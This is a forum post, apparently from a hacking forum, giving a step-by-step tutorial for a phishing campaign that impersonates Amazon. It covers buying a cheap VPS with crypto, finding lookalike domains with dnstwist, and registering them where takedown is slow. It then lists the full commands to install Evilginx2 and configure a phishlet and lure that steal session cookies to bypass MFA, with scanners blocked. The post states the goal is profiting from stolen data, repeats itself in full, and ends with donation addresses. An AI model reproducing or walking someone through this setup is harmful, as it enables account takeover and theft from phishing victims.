OP 11 May, 2024 - 11:39 PM
(This post was last modified: 11 May, 2024 - 11:40 PM by BloodDiamond. Edited 1 time in total.)
Hello, Im gonna start this off by saying this can either A. make you a shit load of money or B. Get you thrown in jail, depends on what you do with your stolen data.
Step1: Get a server
The first step for any phishing campaign is aquiring a relatively cheap VPS to host your page. The best place for this is Panamaserver.com in my opinion. They let you pay with crypto currency (although not XMR sadly) so thats good, and the prices are really chreap. For your os, Chose debian as that will work the best for this.
Step2: Get a phishing domain
In order to figure out what some phishing domains are, i reccomend installing dnstwist on a kali machine and running the domain of the site your using in your attack through it to find available domains. I reccomend using namecheap to buy your domain as they have fairly cheap prices and wont ban it quickly which is always neat.
Step3(time to type): Installing Evilginx2
First off, Evilginx2 is a MiTM phishing framework what also steals session cookies, which can be used to bypass MFA.
To install this we need to run the follwoing
First, Make sure wget is installed.
sudo apt update
sudo apt install wget -y
Next, we need to install Go.
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
Now we install Go.
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
Next, we configure PATH
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
Now we install Evilginx. I prefer this repo as it already as phishlets and saves you some time of hunting down/ Making your own.
sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
After this, Install Globally.
sudo make install
And now run.
sudo evilginx
Step4 Create Page.
Upon running. you will see a list of pages that are all disabled, pick your page of choice, but first we need to configure Evilginx so that we dont have problems
config domain <yourdomain>
config ip <yourIP>
blacklist unauth
The blacklist command is to block your site from scanners. YOU WANT TO DO THIS.
Next, pick your phishlet(phishing page) of choice
phishlets hostname amazon <your domain name>
phishlets enable amazon
Now its time to setup our lure for this site. This is the actual phishing page its self.
lures create amazon
lures edit 0 redirect_url https://amazon.com
lures get-url 0
After running lures get-url 0 you should see a link appear on screen, this is your phishing link.
In another tutorial, i will teach you how to create a email server for spamming mass emails that will land in inbox.
If you have any questions, google it or ask chatgpt
good luck![[Image: PepeBlush.png]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fstatic.cracked.io%2Fimages%2Fsmilies%2FPepeBlush.png)
Step1: Get a server
The first step for any phishing campaign is aquiring a relatively cheap VPS to host your page. The best place for this is Panamaserver.com in my opinion. They let you pay with crypto currency (although not XMR sadly) so thats good, and the prices are really chreap. For your os, Chose debian as that will work the best for this.
Step2: Get a phishing domain
In order to figure out what some phishing domains are, i reccomend installing dnstwist on a kali machine and running the domain of the site your using in your attack through it to find available domains. I reccomend using namecheap to buy your domain as they have fairly cheap prices and wont ban it quickly which is always neat.
Step3(time to type): Installing Evilginx2
First off, Evilginx2 is a MiTM phishing framework what also steals session cookies, which can be used to bypass MFA.
To install this we need to run the follwoing
First, Make sure wget is installed.
sudo apt update
sudo apt install wget -y
Next, we need to install Go.
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
Now we install Go.
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
Next, we configure PATH
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
Now we install Evilginx. I prefer this repo as it already as phishlets and saves you some time of hunting down/ Making your own.
sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
After this, Install Globally.
sudo make install
And now run.
sudo evilginx
Step4 Create Page.
Upon running. you will see a list of pages that are all disabled, pick your page of choice, but first we need to configure Evilginx so that we dont have problems
config domain <yourdomain>
config ip <yourIP>
blacklist unauth
The blacklist command is to block your site from scanners. YOU WANT TO DO THIS.
Next, pick your phishlet(phishing page) of choice
phishlets hostname amazon <your domain name>
phishlets enable amazon
Now its time to setup our lure for this site. This is the actual phishing page its self.
lures create amazon
lures edit 0 redirect_url https://amazon.com
lures get-url 0
After running lures get-url 0 you should see a link appear on screen, this is your phishing link.
In another tutorial, i will teach you how to create a email server for spamming mass emails that will land in inbox.
If you have any questions, google it or ask chatgpt
good luck
If you find my posts useful please consider donating !
BITCOIN: 3GFWnF9G2vXtSi24p1saQGjPuJHenawLuY
XMR:82Z4kzrgaB6iV9C8QVStSWVosx9Wn6nu3WUQ9wwdJ4MKQSokRG1wDDLCdH5mpigW5JidAEH5VWZsbJFD9epJkNdf4gvJQj9
BITCOIN: 3GFWnF9G2vXtSi24p1saQGjPuJHenawLuY
XMR:82Z4kzrgaB6iV9C8QVStSWVosx9Wn6nu3WUQ9wwdJ4MKQSokRG1wDDLCdH5mpigW5JidAEH5VWZsbJFD9epJkNdf4gvJQj9